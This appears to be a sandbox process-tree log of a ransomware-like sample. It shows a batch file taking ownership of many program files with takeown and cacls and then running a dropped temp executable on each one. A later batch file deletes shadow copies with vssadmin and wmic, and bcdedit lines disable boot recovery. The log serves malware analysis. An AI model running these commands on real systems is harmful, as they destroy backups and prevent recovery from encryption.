  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:1824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:1032
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:1408
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C
    3⤵
    PID:620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"
    3⤵
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "GoogleUpdateSetup.exe" -nobanner
      4⤵
      PID:232
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:1408
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:1052
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:1664
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1056
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:1916
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:948
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:940
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:788
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1532
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:1880
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:948
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:788
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:240

C:\Windows\system32\taskeng.exe
taskeng.exe {F40C75F1-2DB8-47CB-9DEB-9BAC61602E96} S-1-5-21-2090973689-680783404-4292415065-1000:UCQFZDUI\Admin:Interactive:[1]
1⤵
PID:960
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\w9GiDE50.bat"
  2⤵
  PID:1476
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1948
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:220
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1940